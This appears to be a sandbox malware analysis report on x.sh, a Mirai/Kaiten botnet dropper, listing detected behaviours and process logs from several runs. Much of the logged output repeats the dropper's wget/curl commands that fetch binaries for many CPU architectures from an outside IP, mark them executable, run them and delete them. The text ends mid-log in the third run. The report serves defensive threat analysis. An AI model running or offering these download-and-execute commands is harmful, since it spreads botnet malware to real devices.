Malware Analysis Report

2025-05-28 17:41

Sample ID 250520-vnnp2shn2v
Target x.sh
SHA256 f8db4d2d9ec809a2d86f015f3a25685e47ca8889003914e2a5df5b9bfc6eabac
Tags
kaiten mirai owari botnet defense_evasion discovery antivm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f8db4d2d9ec809a2d86f015f3a25685e47ca8889003914e2a5df5b9bfc6eabac

Threat Level: Known bad

The file x.sh was found to be: Known bad.

Malicious Activity Summary

kaiten mirai owari botnet defense_evasion discovery antivm

Detects Kaiten/Tsunami payload

Detects Kaiten/Tsunami Payload

Mirai family

Mirai

Kaiten family

Kaiten/Tsunami

Modifies Watchdog functionality

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Executes dropped EXE

Enumerates running processes

Enumerates active TCP sockets

Reads system network configuration

Checks CPU configuration

Changes its process name

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-05-20 17:08

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2025-05-20 17:08

Reported

2025-05-20 17:10

Platform

debian9-mipsbe-20240418-en

Max time kernel

41s

Max time network

39s

Command Line

[/tmp/x.sh]

Signatures

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GoldAge3ATOarm /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm5 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm6 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm7 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOm68k /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmips /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmpsl /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOppc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOsh4 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOspc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx64 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx86 /tmp/x.sh N/A
N/A /tmp/bash /tmp/x.sh N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/GoldAge3ATOmips N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/wget N/A
File opened for modification /tmp/bash /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/wget N/A
File opened for modification /tmp/bash /usr/bin/curl N/A

Processes

/tmp/x.sh

[/tmp/x.sh]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm]

/tmp/GoldAge3ATOarm

[/tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm5]

/tmp/GoldAge3ATOarm5

[/tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm6]

/tmp/GoldAge3ATOarm6

[/tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm7]

/tmp/GoldAge3ATOarm7

[/tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOm68k]

/tmp/GoldAge3ATOm68k

[/tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmips]

/tmp/GoldAge3ATOmips

[/tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmpsl]

/tmp/GoldAge3ATOmpsl

[/tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOppc]

/tmp/GoldAge3ATOppc

[/tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOsh4]

/tmp/GoldAge3ATOsh4

[/tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOspc]

/tmp/GoldAge3ATOspc

[/tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx64]

/tmp/GoldAge3ATOx64

[/tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx86]

/tmp/GoldAge3ATOx86

[/tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86.1]

/usr/bin/wget

[wget http://185.236.24.192/bash -O /tmp/bash]

/usr/bin/curl

[curl http://185.236.24.192/bash -o /tmp/bash]

/bin/chmod

[chmod +x /tmp/bash]

/tmp/bash

[/tmp/bash]

/bin/rm

[rm -rf /tmp/bash]

/bin/rm

[rm -rf /tmp/bash.1]

Network

Country Destination Domain Proto
FI 185.236.24.192:80 185.236.24.192 tcp

Files

/tmp/GoldAge3ATOarm
/tmp/GoldAge3ATOarm5
/tmp/GoldAge3ATOarm6
/tmp/GoldAge3ATOarm7
/tmp/GoldAge3ATOm68k
/tmp/GoldAge3ATOmips
/tmp/GoldAge3ATOmpsl
/tmp/GoldAge3ATOppc
/tmp/GoldAge3ATOsh4
/tmp/GoldAge3ATOspc
/tmp/GoldAge3ATOx64
/tmp/GoldAge3ATOx86
/tmp/bash

Analysis: behavioral4

Detonation Overview

Submitted

2025-05-20 17:08

Reported

2025-05-20 17:10

Platform

debian9-mipsel-20250410-en

Max time kernel

40s

Max time network

40s

Command Line

[/tmp/x.sh]

Signatures

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GoldAge3ATOarm /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm5 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm6 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm7 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOm68k /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmips /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmpsl /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOppc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOsh4 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOspc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx64 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx86 /tmp/x.sh N/A
N/A /tmp/bash /tmp/x.sh N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/GoldAge3ATOmips N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/curl N/A
File opened for modification /tmp/bash /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/curl N/A
File opened for modification /tmp/bash /usr/bin/curl N/A

Processes

/tmp/x.sh

[/tmp/x.sh]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm]

/tmp/GoldAge3ATOarm

[/tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm5]

/tmp/GoldAge3ATOarm5

[/tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm6]

/tmp/GoldAge3ATOarm6

[/tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm7]

/tmp/GoldAge3ATOarm7

[/tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOm68k]

/tmp/GoldAge3ATOm68k

[/tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmips]

/tmp/GoldAge3ATOmips

[/tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmpsl]

/tmp/GoldAge3ATOmpsl

[/tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOppc]

/tmp/GoldAge3ATOppc

[/tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOsh4]

/tmp/GoldAge3ATOsh4

[/tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOspc]

/tmp/GoldAge3ATOspc

[/tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx64]

/tmp/GoldAge3ATOx64

[/tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx86]

/tmp/GoldAge3ATOx86

[/tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86.1]

/usr/bin/wget

[wget http://185.236.24.192/bash -O /tmp/bash]

/usr/bin/curl

[curl http://185.236.24.192/bash -o /tmp/bash]

/bin/chmod

[chmod +x /tmp/bash]

/tmp/bash

[/tmp/bash]

/bin/rm

[rm -rf /tmp/bash]

/bin/rm

[rm -rf /tmp/bash.1]

Network

Country Destination Domain Proto
FI 185.236.24.192:80 185.236.24.192 tcp

Files

/tmp/GoldAge3ATOarm
/tmp/GoldAge3ATOarm5
/tmp/GoldAge3ATOarm6
/tmp/GoldAge3ATOarm7
/tmp/GoldAge3ATOm68k
/tmp/GoldAge3ATOmips
/tmp/GoldAge3ATOmpsl
/tmp/GoldAge3ATOppc
/tmp/GoldAge3ATOsh4
/tmp/GoldAge3ATOspc
/tmp/GoldAge3ATOx64
/tmp/GoldAge3ATOx86
/tmp/bash

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-20 17:08

Reported

2025-05-20 17:10

Platform

ubuntu1804-amd64-20250410-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/x.sh]

Signatures

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GoldAge3ATOarm /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm5 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm6 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm7 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOm68k /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmips /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmpsl /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOppc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOsh4 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOspc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx64 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx86 /tmp/x.sh N/A
N/A /tmp/bash /tmp/x.sh N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/misc/watchdog /tmp/x.sh N/A
File opened for modification /dev/watchdog /tmp/GoldAge3ATOx64 N/A
File opened for modification /dev/misc/watchdog /tmp/GoldAge3ATOx64 N/A
File opened for modification /dev/watchdog /tmp/x.sh N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 84.162.70.65 N/A N/A

Enumerates active TCP sockets

discovery
Description Indicator Process Target
File opened for reading /proc/net/tcp /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/net/tcp /tmp/x.sh N/A

Enumerates running processes

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself shhssabbbahasbssash /tmp/GoldAge3ATOx64 N/A
Changes the process name, possibly in an attempt to hide itself N/A /tmp/x.sh N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/tcp /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/net/tcp /tmp/x.sh N/A

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/GoldAge3ATOmips N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/wget N/A
File opened for modification /tmp/bash /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/wget N/A
File opened for modification /tmp/bash /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/curl N/A

Processes

/tmp/x.sh

[/tmp/x.sh]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm]

/tmp/GoldAge3ATOarm

[/tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm5]

/tmp/GoldAge3ATOarm5

[/tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm6]

/tmp/GoldAge3ATOarm6

[/tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm7]

/tmp/GoldAge3ATOarm7

[/tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOm68k]

/tmp/GoldAge3ATOm68k

[/tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmips]

/tmp/GoldAge3ATOmips

[/tmp/GoldAge3ATOmips]

/bin/rm

